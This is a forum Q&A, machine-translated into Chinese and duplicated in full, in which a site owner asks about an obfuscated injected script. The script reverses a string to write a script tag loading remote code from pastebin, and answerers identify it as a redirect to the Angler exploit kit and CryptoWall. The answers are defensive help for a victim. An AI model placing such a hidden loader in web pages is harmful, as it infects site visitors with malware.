Javascript Google 扫描程序检测到恶意软件
Javascript Malware Detected by Google Scanner
我最近在我的网站上看到了以下代码
<script type=""text/javascript"">
document.write('>tpircs/<>""YWVPsGmx=i?php.war/moc.nibetsap//:ptth""=crs tpircs<'.split("""").reverse().join(""""))
</script>
这段代码有什么作用?我是 XSS 的受害者吗?我的托管公司有什么可以做的吗,例如恶意软件扫描器等?
该文本被反转以形成一个 pastebin link - 加载该 pastebin 中的脚本,并在浏览器中 运行 与您的站点代码的其余部分。
这是指向漏洞利用工具包的重定向代码。实际 URL 是
pastebin[.]com/raw[.]php?i=xmGsPVWY ---> trak[masked].co.in/js
请从您服务器上托管的所有页面中删除此代码。
您的网站已被入侵(被黑)并注入了恶意 javascript 代码。
它使用多种 redirection/encoding 方法,但最后会将您的访问者推送到 Angler EK(漏洞利用工具包),然后尝试将 CryptoWall 强加给您的用户。
您可以在这里尝试扫描:
http://www.unmaskparasites.com/
查找有关恶意软件的更多详细信息。
谢谢,
我最近在我的网站上看到了以下代码
<script type=""text/javascript"">
document.write('>tpircs/<>""YWVPsGmx=i?php.war/moc.nibetsap//:ptth""=crs tpircs<'.split("""").reverse().join(""""))
</script>
这段代码有什么作用?我是 XSS 的受害者吗?我的托管公司有什么可以做的吗,例如恶意软件扫描器等?
该文本被反转以形成一个 pastebin link - 加载该 pastebin 中的脚本,并在浏览器中 运行 与您的站点代码的其余部分。
这是指向漏洞利用工具包的重定向代码。实际 URL 是
pastebin[.]com/raw[.]php?i=xmGsPVWY ---> trak[masked].co.in/js
请从您服务器上托管的所有页面中删除此代码。
您的网站已被入侵(被黑)并注入了恶意 javascript 代码。
它使用多种 redirection/encoding 方法,但最后会将您的访问者推送到 Angler EK(漏洞利用工具包),然后尝试将 CryptoWall 强加给您的用户。
您可以在这里尝试扫描:
http://www.unmaskparasites.com/
查找有关恶意软件的更多详细信息。
谢谢,